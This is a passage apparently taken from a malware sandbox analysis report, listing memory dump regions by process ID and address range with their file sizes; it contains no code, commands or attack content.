                                                                                                                                                                                  Filesize

                                                                                                                                                                                  408KB

                                                                                                                                                                                • memory/1620-515-0x00000000077C0000-0x00000000077C8000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  32KB

                                                                                                                                                                                • memory/1620-514-0x0000000007870000-0x000000000788A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  104KB

                                                                                                                                                                                • memory/1620-513-0x0000000007790000-0x00000000077A4000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  80KB

                                                                                                                                                                                • memory/1620-450-0x0000000006200000-0x000000000621E000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  120KB

                                                                                                                                                                                • memory/1620-511-0x0000000007740000-0x0000000007751000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  68KB

                                                                                                                                                                                • memory/1620-506-0x00000000077D0000-0x0000000007866000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  600KB

                                                                                                                                                                                • memory/1620-505-0x00000000075B0000-0x00000000075BA000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  40KB

                                                                                                                                                                                • memory/1620-471-0x00000000071D0000-0x0000000007202000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  200KB

                                                                                                                                                                                • memory/1620-472-0x000000006EC50000-0x000000006EC9C000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  304KB

                                                                                                                                                                                • memory/1620-482-0x00000000067D0000-0x00000000067EE000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  120KB

                                                                                                                                                                                • memory/1620-483-0x0000000007210000-0x00000000072B3000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  652KB

                                                                                                                                                                                • memory/1620-427-0x0000000005360000-0x0000000005988000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6.2MB

                                                                                                                                                                                • memory/1620-503-0x0000000007BE0000-0x000000000825A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6.5MB

                                                                                                                                                                                • memory/1740-469-0x00007FF9E6CE0000-0x00007FF9E6CED000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  52KB

                                                                                                                                                                                • memory/1740-868-0x00007FF9E2DF0000-0x00007FF9E2E1D000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  180KB

                                                                                                                                                                                • memory/1740-865-0x00007FF9C8F00000-0x00007FF9C9275000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3.5MB

                                                                                                                                                                                • memory/1740-507-0x00007FF9E2DC0000-0x00007FF9E2DE3000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  140KB

                                                                                                                                                                                • memory/1740-468-0x00007FF9DF670000-0x00007FF9DF684000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  80KB

                                                                                                                                                                                • memory/1740-463-0x00007FF9CDF90000-0x00007FF9CE578000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  5.9MB

                                                                                                                                                                                • memory/1740-464-0x00007FF9DF150000-0x00007FF9DF208000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  736KB

                                                                                                                                                                                • memory/1740-465-0x0000022CB1150000-0x0000022CB14C5000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3.5MB

                                                                                                                                                                                • memory/1740-467-0x00007FF9E2E20000-0x00007FF9E2E44000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  144KB

                                                                                                                                                                                • memory/1740-527-0x00007FF9CDE10000-0x00007FF9CDF83000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.4MB

                                                                                                                                                                                • memory/1740-586-0x00007FF9E2DA0000-0x00007FF9E2DB9000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  100KB

                                                                                                                                                                                • memory/1740-779-0x00007FF9CDF90000-0x00007FF9CE578000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  5.9MB

                                                                                                                                                                                • memory/1740-664-0x00007FF9DF690000-0x00007FF9DF6BE000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  184KB

                                                                                                                                                                                • memory/1740-666-0x0000022CB1150000-0x0000022CB14C5000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3.5MB

                                                                                                                                                                                • memory/1740-665-0x00007FF9DF150000-0x00007FF9DF208000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  736KB

                                                                                                                                                                                • memory/1740-675-0x00007FF9CDE10000-0x00007FF9CDF83000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.4MB

                                                                                                                                                                                • memory/1740-670-0x00007FF9E2E20000-0x00007FF9E2E44000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  144KB

                                                                                                                                                                                • memory/1740-684-0x00007FF9C8F00000-0x00007FF9C9275000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3.5MB

                                                                                                                                                                                • memory/1740-669-0x00007FF9CDF90000-0x00007FF9CE578000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  5.9MB

                                                                                                                                                                                • memory/1740-875-0x00007FF9DF150000-0x00007FF9DF208000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  736KB

                                                                                                                                                                                • memory/1740-466-0x00007FF9C8F00000-0x00007FF9C9275000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3.5MB

                                                                                                                                                                                • memory/1740-877-0x00007FF9E6CE0000-0x00007FF9E6CED000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  52KB

                                                                                                                                                                                • memory/1740-878-0x00007FF9CF070000-0x00007FF9CF18C000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.1MB

                                                                                                                                                                                • memory/1740-876-0x00007FF9DF670000-0x00007FF9DF684000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  80KB

                                                                                                                                                                                • memory/1740-850-0x00007FF9CDF90000-0x00007FF9CE578000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  5.9MB

                                                                                                                                                                                • memory/1740-866-0x00007FF9E2E20000-0x00007FF9E2E44000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  144KB

                                                                                                                                                                                • memory/1740-867-0x00007FF9E7E10000-0x00007FF9E7E1F000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  60KB

                                                                                                                                                                                • memory/1740-874-0x00007FF9DF690000-0x00007FF9DF6BE000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  184KB

                                                                                                                                                                                • memory/1740-869-0x00007FF9E3330000-0x00007FF9E3349000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  100KB

                                                                                                                                                                                • memory/1740-870-0x00007FF9E2DC0000-0x00007FF9E2DE3000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  140KB

                                                                                                                                                                                • memory/1740-871-0x00007FF9CDE10000-0x00007FF9CDF83000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.4MB

                                                                                                                                                                                • memory/1740-462-0x00007FF9DF690000-0x00007FF9DF6BE000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  184KB

                                                                                                                                                                                • memory/1740-461-0x00007FF9E6D40000-0x00007FF9E6D4D000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  52KB

                                                                                                                                                                                • memory/1740-460-0x00007FF9E2DA0000-0x00007FF9E2DB9000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  100KB

                                                                                                                                                                                • memory/1740-459-0x00007FF9CDE10000-0x00007FF9CDF83000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.4MB

                                                                                                                                                                                • memory/1740-458-0x00007FF9E2DC0000-0x00007FF9E2DE3000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  140KB

                                                                                                                                                                                • memory/1740-457-0x00007FF9E3330000-0x00007FF9E3349000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  100KB

                                                                                                                                                                                • memory/1740-456-0x00007FF9E2DF0000-0x00007FF9E2E1D000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  180KB

                                                                                                                                                                                • memory/1740-449-0x00007FF9E7E10000-0x00007FF9E7E1F000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  60KB

                                                                                                                                                                                • memory/1740-448-0x00007FF9E2E20000-0x00007FF9E2E44000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  144KB

                                                                                                                                                                                • memory/1740-445-0x00007FF9CDF90000-0x00007FF9CE578000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  5.9MB

                                                                                                                                                                                • memory/1740-872-0x00007FF9E2DA0000-0x00007FF9E2DB9000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  100KB

                                                                                                                                                                                • memory/1740-470-0x00007FF9CF070000-0x00007FF9CF18C000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.1MB

                                                                                                                                                                                • memory/1740-873-0x00007FF9E6D40000-0x00007FF9E6D4D000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  52KB

                                                                                                                                                                                • memory/2396-839-0x0000000000B20000-0x0000000000B2A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  40KB

                                                                                                                                                                                • memory/2428-11-0x00000000050B0000-0x000000000514C000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  624KB

                                                                                                                                                                                • memory/2428-10-0x0000000000680000-0x0000000000688000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  32KB

                                                                                                                                                                                • memory/2520-285-0x00007FF7CA380000-0x00007FF7CAFB4000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  12.2MB

                                                                                                                                                                                • memory/2520-284-0x00000245B71F0000-0x00000245B7210000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  128KB

                                                                                                                                                                                • memory/2864-596-0x000001C1271E0000-0x000001C1271E8000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  32KB

                                                                                                                                                                                • memory/3012-23-0x0000000000960000-0x0000000000CC6000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3.4MB

                                                                                                                                                                                • memory/3308-2-0x00000000007C0000-0x00000000007C8000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  32KB

                                                                                                                                                                                • memory/4156-747-0x0000000000520000-0x00000000005A4000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  528KB

                                                                                                                                                                                • memory/4196-323-0x000000001B880000-0x000000001B88C000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  48KB

                                                                                                                                                                                • memory/4196-320-0x000000001AF70000-0x000000001AF86000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  88KB

                                                                                                                                                                                • memory/4196-319-0x0000000000360000-0x0000000000430000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  832KB

                                                                                                                                                                                • memory/4196-322-0x000000001C640000-0x000000001C6B6000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  472KB

                                                                                                                                                                                • memory/4196-321-0x000000001C510000-0x000000001C5C2000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  712KB

                                                                                                                                                                                • memory/4200-845-0x0000000006240000-0x0000000006594000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3.3MB

                                                                                                                                                                                • memory/4320-371-0x0000000000FC0000-0x0000000001016000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  344KB

                                                                                                                                                                                • memory/4396-48-0x000000001C070000-0x000000001C122000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  712KB

                                                                                                                                                                                • memory/4396-46-0x0000000000B30000-0x0000000000E54000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3.1MB

                                                                                                                                                                                • memory/4396-47-0x000000001BF60000-0x000000001BFB0000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  320KB

                                                                                                                                                                                • memory/4528-748-0x000001AE34A70000-0x000001AE34A8C000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  112KB

                                                                                                                                                                                • memory/4528-752-0x000001AE34A60000-0x000001AE34A68000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  32KB

                                                                                                                                                                                • memory/4528-736-0x000001AE34830000-0x000001AE3484C000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  112KB

                                                                                                                                                                                • memory/4528-744-0x000001AE34850000-0x000001AE34905000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  724KB

                                                                                                                                                                                • memory/4528-746-0x000001AE1C090000-0x000001AE1C09A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  40KB

                                                                                                                                                                                • memory/4528-749-0x000001AE34A50000-0x000001AE34A5A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  40KB

                                                                                                                                                                                • memory/4528-751-0x000001AE34AB0000-0x000001AE34ACA000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  104KB

                                                                                                                                                                                • memory/4528-754-0x000001AE34AA0000-0x000001AE34AAA000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  40KB

                                                                                                                                                                                • memory/4528-753-0x000001AE34A90000-0x000001AE34A96000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  24KB

                                                                                                                                                                                • memory/4740-818-0x0000000000360000-0x0000000000684000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3.1MB

                                                                                                                                                                                • memory/5032-258-0x0000000000400000-0x0000000000639000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  2.2MB

                                                                                                                                                                                • memory/5032-272-0x0000000000400000-0x0000000000639000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  2.2MB

                                                                                                                                                                                • memory/5124-828-0x0000000000400000-0x00000000006D4000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  2.8MB

                                                                                                                                                                                • memory/5200-761-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  56KB

                                                                                                                                                                                • memory/5200-757-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  56KB

                                                                                                                                                                                • memory/5200-765-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  56KB

                                                                                                                                                                                • memory/5200-760-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  56KB

                                                                                                                                                                                • memory/5200-759-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  56KB

                                                                                                                                                                                • memory/5200-758-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  56KB

                                                                                                                                                                                • memory/5616-888-0x000000006EC50000-0x000000006EC9C000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  304KB